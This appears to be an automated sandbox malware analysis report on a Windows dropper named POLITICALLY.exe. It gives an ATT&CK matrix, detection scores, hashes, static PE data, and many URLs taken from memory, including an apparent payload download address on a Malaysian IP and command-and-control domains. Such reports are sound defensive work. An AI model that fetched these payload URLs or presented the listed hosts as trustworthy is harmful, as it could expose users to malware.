Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules1 | Path Interception | Process Injection412 | Virtualization/Sandbox Evasion21 | OS Credential Dumping | Security Software Discovery521 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection412 | LSASS Memory | Virtualization/Sandbox Evasion21 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information3 | NTDS | System Information Discovery211 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol111 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |

Behavior Graph

(Behavior graph image not reproduced in this text version.)

Screenshots

(Screenshot thumbnails not reproduced in this text version.)

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

Source | Detection | Scanner | Label
POLITICALLY.exe | 17% | Virustotal |
POLITICALLY.exe | 17% | ReversingLabs | Win32.Worm.Wbvb

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

Source | Detection | Scanner | Label
23.2.control.exe.4fb518.1.unpack | 100% | Avira | TR/Dropper.Gen
23.2.control.exe.4d37960.4.unpack | 100% | Avira | TR/Dropper.Gen

        Domains

        No Antivirus matches

        URLs

Source | Detection | Scanner | Label
http://www.6923599.com/olg8/ | 0% | Avira URL Cloud | safe
http://www.moopyo.com | 0% | Avira URL Cloud | safe
http://www.easiersell.comReferer: | 0% | Avira URL Cloud | safe
http://www.artboxxstudio.com/olg8/ | 0% | Avira URL Cloud | safe
http://www.wiseowldigital.comReferer: | 0% | Avira URL Cloud | safe
http://www.easiersell.com/olg8/www.assroyalty.club | 0% | Avira URL Cloud | safe
http://www.tuancai.net/olg8/ | 0% | Avira URL Cloud | safe
http://www.policomercial.com/olg8/ | 0% | Avira URL Cloud | safe
http://www.artboxxstudio.com/olg8/www.onlinewomensclasses.com | 0% | Avira URL Cloud | safe
http://www.assroyalty.club | 0% | Avira URL Cloud | safe
http://www.6923599.comReferer: | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.assroyalty.club/olg8/www.tuancai.net | 0% | Avira URL Cloud | safe
http://www.artboxxstudio.comReferer: | 0% | Avira URL Cloud | safe
http://www.nortier.cloud | 0% | Avira URL Cloud | safe
http://www.cunerier.comReferer: | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.soakstress.xyz/olg8/www.moopyo.com | 0% | Avira URL Cloud | safe
http://111.90.149.46/bin_XNLhDlJvG218.bin | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.prismatiq.techReferer: | 0% | Avira URL Cloud | safe
http://www.soakstress.xyz | 0% | Avira URL Cloud | safe
http://www.soakstress.xyz/olg8/ | 0% | Avira URL Cloud | safe
http://www.onlinewomensclasses.com | 0% | Avira URL Cloud | safe
http://www.wiseowldigital.com/olg8/www.cunerier.com | 0% | Avira URL Cloud | safe
http://www.morgolf.com | 0% | Avira URL Cloud | safe
http://www.onlinewomensclasses.com/olg8/ | 0% | Avira URL Cloud | safe
http://www.soakstress.xyzReferer: | 0% | Avira URL Cloud | safe
http://111.90.149.46/bin_XNLhDlJvG218.binb) | 0% | Avira URL Cloud | safe
http://www.6923599.com | 0% | Avira URL Cloud | safe
http://www.nortier.cloud/olg8/ | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.assroyalty.clubReferer: | 0% | Avira URL Cloud | safe
http://www.morgolf.com/olg8/www.easiersell.com | 0% | Avira URL Cloud | safe
http://www.tuancai.net | 0% | Avira URL Cloud | safe
http://www.6923599.com/olg8/www.wiseowldigital.com | 0% | Avira URL Cloud | safe
http://www.purplebean.companyReferer: | 0% | Avira URL Cloud | safe
http://www.onlinewomensclasses.com/olg8/www.policomercial.com | 0% | Avira URL Cloud | safe
http://www.cunerier.com | 0% | Avira URL Cloud | safe
http://www.cunerier.com/olg8/ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.moopyo.com/olg8/ | 0% | Avira URL Cloud | safe
http://www.auroraleathers.com/olg8/ | 0% | Avira URL Cloud | safe
http://www.auroraleathers.comReferer: | 0% | Avira URL Cloud | safe
http://www.prismatiq.tech/olg8/www.soakstress.xyz | 0% | Avira URL Cloud | safe
http://www.tuancai.net/olg8/www.auroraleathers.com | 0% | Avira URL Cloud | safe
http://www.morgolf.com/olg8/ | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.prismatiq.tech | 0% | Avira URL Cloud | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.assroyalty.club/olg8/ | 0% | Avira URL Cloud | safe
http://www.tuancai.netReferer: | 0% | Avira URL Cloud | safe
http://www.easiersell.com/olg8/ | 0% | Avira URL Cloud | safe
http://www.onlinewomensclasses.comReferer: | 0% | Avira URL Cloud | safe
http://www.policomercial.comReferer: | 0% | Avira URL Cloud | safe
http://www.wiseowldigital.com/olg8/ | 0% | Avira URL Cloud | safe
http://www.nortier.cloudReferer: | 0% | Avira URL Cloud | safe
http://www.auroraleathers.com/olg8/www.artboxxstudio.com | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.easiersell.com | 0% | Avira URL Cloud | safe
http://www.moopyo.comReferer: | 0% | Avira URL Cloud | safe
http://111.90.149.46/bin_XNLhDlJvG218.bin3 | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.auroraleathers.com | 0% | Avira URL Cloud | safe
http://111.90.149.46/bin_XNLhDlJvG218.bin/ | 0% | Avira URL Cloud | safe
http://111.90.149.46/bin_XNLhDlJvG218.binw | 0% | Avira URL Cloud | safe
http://111.90.149.46/in_XNLhDlJvG218.bin | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://111.90.149.46/bin_XNLhDlJvG218.bin | true | Avira URL Cloud: safe | unknown
www.nortier.cloud/olg8/ | true | Avira URL Cloud: safe | low

        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.6923599.com/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.moopyo.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.easiersell.comReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.artboxxstudio.com/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wiseowldigital.comReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.easiersell.com/olg8/www.assroyalty.club | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tuancai.net/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.policomercial.com/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.artboxxstudio.com/olg8/www.onlinewomensclasses.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.assroyalty.club | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.6923599.comReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.assroyalty.club/olg8/www.tuancai.net | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.artboxxstudio.comReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nortier.cloud | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cunerier.comReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.soakstress.xyz/olg8/www.moopyo.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.prismatiq.techReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.soakstress.xyz | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.soakstress.xyz/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000013.00000000.507594698.000000000095C000.00000004.00000020.sdmp | false | | high
http://www.onlinewomensclasses.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wiseowldigital.com/olg8/www.cunerier.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.morgolf.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.onlinewomensclasses.com/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.soakstress.xyzReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://111.90.149.46/bin_XNLhDlJvG218.binb) | POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.6923599.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nortier.cloud/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.assroyalty.clubReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.morgolf.com/olg8/www.easiersell.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tuancai.net | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.6923599.com/olg8/www.wiseowldigital.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.purplebean.companyReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.onlinewomensclasses.com/olg8/www.policomercial.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cunerier.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designersG | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.cunerier.com/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.moopyo.com/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.auroraleathers.com/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.auroraleathers.comReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.prismatiq.tech/olg8/www.soakstress.xyz | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tuancai.net/olg8/www.auroraleathers.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.morgolf.com/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.prismatiq.tech | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.typography.netD | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.assroyalty.club/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tuancai.netReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.easiersell.com/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.onlinewomensclasses.comReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.policomercial.comReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wiseowldigital.com/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nortier.cloudReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.auroraleathers.com/olg8/www.artboxxstudio.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.easiersell.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.moopyo.comReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://111.90.149.46/bin_XNLhDlJvG218.bin3 | POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sakkal.com | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.auroraleathers.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://111.90.149.46/bin_XNLhDlJvG218.bin/ | POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://111.90.149.46/bin_XNLhDlJvG218.binw | POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://111.90.149.46/in_XNLhDlJvG218.bin | POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.purplebean.company/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wiseowldigital.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.morgolf.comReferer: | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.artboxxstudio.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.policomercial.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.policomercial.com/olg8/www.6923599.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.purplebean.company | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.purplebean.company/olg8/www.nortier.cloud | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.moopyo.com/olg8/www.morgolf.com | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.prismatiq.tech/olg8/ | explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | false
                              • Avira URL Cloud: safe
                              unknown
                              http://www.cunerier.com/olg8/www.purplebean.companyexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown

                              Contacted IPs


                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
111.90.149.46 | unknown | Malaysia | 45839 | SHINJIRU-MY-AS-AP Shinjiru Technology Sdn Bhd (MY) | true

                              General Information

                              Joe Sandbox Version:32.0.0 Black Diamond
                              Analysis ID:411376
                              Start date:11.05.2021
                              Start time:20:41:30
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 9m 36s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:POLITICALLY.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:27
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:1
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.rans.troj.spyw.evad.winEXE@7/0@0/1
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 32.9% (good quality ratio 28.7%)
                              • Quality average: 71%
                              • Quality standard deviation: 33.3%
                              HCA Information:
                              • Successful, ratio: 57%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • TCP Packets have been reduced to 100
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

Match | Associated Sample Name / URL | Detection | Context
111.90.149.46 | attached template.exe | malicious | 111.90.149.46/chris_fctvQ149.bin

                              Domains

                              No context

                              ASN

Match | Associated Sample Name / URL | Detection | Context
SHINJIRU-MY-AS-AP Shinjiru Technology Sdn Bhd (MY):
• attached template.exe | malicious | 111.90.149.46
• 0F1D9F17D6380C6318F136F9F951922CFFD80BA90FA87.exe | malicious | 101.99.84.46
• 2f50000.exe | malicious | 124.217.246.96
• d801e424_by_Libranalysis.docx | malicious | 101.99.95.105
• SecuriteInfo.com.ArtemisB23AF6C6F1A9.18153.exe | malicious | 101.99.91.200
• t0lYf7AR1S.exe | malicious | 101.99.91.200
• SecuriteInfo.com.Trojan.Siggen12.47248.30665.exe | malicious | 101.99.90.200
• SecuriteInfo.com.Trojan.Siggen12.47248.964.exe | malicious | 101.99.90.200
• SecuriteInfo.com.Trojan.Siggen12.47248.16606.exe | malicious | 101.99.90.200
• SecuriteInfo.com.Trojan.Siggen12.47234.30189.exe | malicious | 101.99.90.200
• SecuriteInfo.com.Trojan.Siggen12.47248.1366.exe | malicious | 101.99.90.200
• co#U00cc pia de pagamento.xlsx | malicious | 111.90.146.131
• OUOTATION.doc | malicious | 101.99.91.20
• JQQyuX3xg6.exe | malicious | 111.90.150.162
• m2xzKhblzC.exe | malicious | 111.90.150.162
• q1JP6yNjf3.exe | malicious | 111.90.150.37
• seed.exe | malicious | 101.99.90.200
• SecuriteInfo.com.BehavesLike.Win32.Virut.rc.exe | malicious | 111.90.146.182
• PO-3170012466.exe | malicious | 101.99.90.137
• 0238-35-pdf.scr.exe | malicious | 101.99.70.172

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):4.19678454383093
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.15%
                              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:POLITICALLY.exe
                              File size:225280
                              MD5:80b3365808440838596864bd6d492c02
                              SHA1:ea14e621d263a3754234a65bc76cff61bf9eceab
                              SHA256:8d6f73da5150cd26789a9a0e0643f69b520306680523d91cb21438ad2e6fa80c
                              SHA512:099d2a0694b12a503b8af3e192dc620b5902a76ceb0d353e7fdd1d8324e9309a32c5982360c1f83cd5c0f8e8671556764cb832e43d25d2fa6c1a5d9bef188dbc
                              SSDEEP:768:OAXQMQNI4JuxzJ4j7gazx8RazCmE9ejxvZZHlPbUlmFZ2/5Pj3KZhmOwk/Z2ZOqk:HQE67XsaGeBnVYlmO/tKZcnOYaUHfwH
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........I....................................Rich............................PE..L...z9.V.................@...0......l........P....@

                              File Icon

                              Icon Hash:20047c7c70f0e004

                              Static PE Info

                              General

                              Entrypoint:0x40186c
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                              DLL Characteristics:
                              Time Stamp:0x5617397A [Fri Oct 9 03:50:18 2015 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:263c7af0bbeabd79b6d008518dc45217

Entrypoint Preview

Only the first two instructions here are code: push 00401D18h passes the address of the VB header structure (the one beginning with the "VB5!" signature) and the following call enters the MSVBVM60 runtime, which is the standard startup stub of a Visual Basic 6 executable and matches the MSVBVM60.DLL import listed below. Everything after that call is data that the preview has disassembled linearly (the runs of "add byte ptr [eax], al" are zero bytes) and should not be read as control flow.

Instruction
                              push 00401D18h
                              call 00007FDAB4B190F5h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              inc eax
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx-003A59BAh], bh
                              dec esi
                              mov ch, 4Ah
                              scasd
                              or ax, 0000F3CFh
                              fyl2xp1
                              adc eax, 00000000h
                              add byte ptr [eax], al
                              add dword ptr [eax], eax
                              add byte ptr [eax], al
                              inc edx
                              add byte ptr [esi], al
                              push eax
                              add dword ptr [edx], 70h
                              jc 00007FDAB4B19171h
                              jo 00007FDAB4B19163h
                              imul ebp, dword ptr [bp+65h], B4000073h
                              dec ebp
                              jno 00007FDAB4B19104h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              dec esp
                              xor dword ptr [eax], eax
                              or byte ptr [edi], cl
                              jnbe 00007FDAB4B1912Eh
                              adc byte ptr [esi-5EBA1FE9h], FFFFFFD0h
                              mov cl, AEh
                              xchg eax, edi
                              or eax, ecx
                              add ah, byte ptr [eax-74h]
                              mov edx, A94DAC2Ch
                              mov eax, 5CDE5CBFh
                              xor eax, AD4F3A6Dh
                              xor ebx, dword ptr [ecx-48EE309Ah]
                              or al, 00h
                              stosb
                              add byte ptr [eax-2Dh], ah
                              xchg eax, ebx
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              retf 0001h
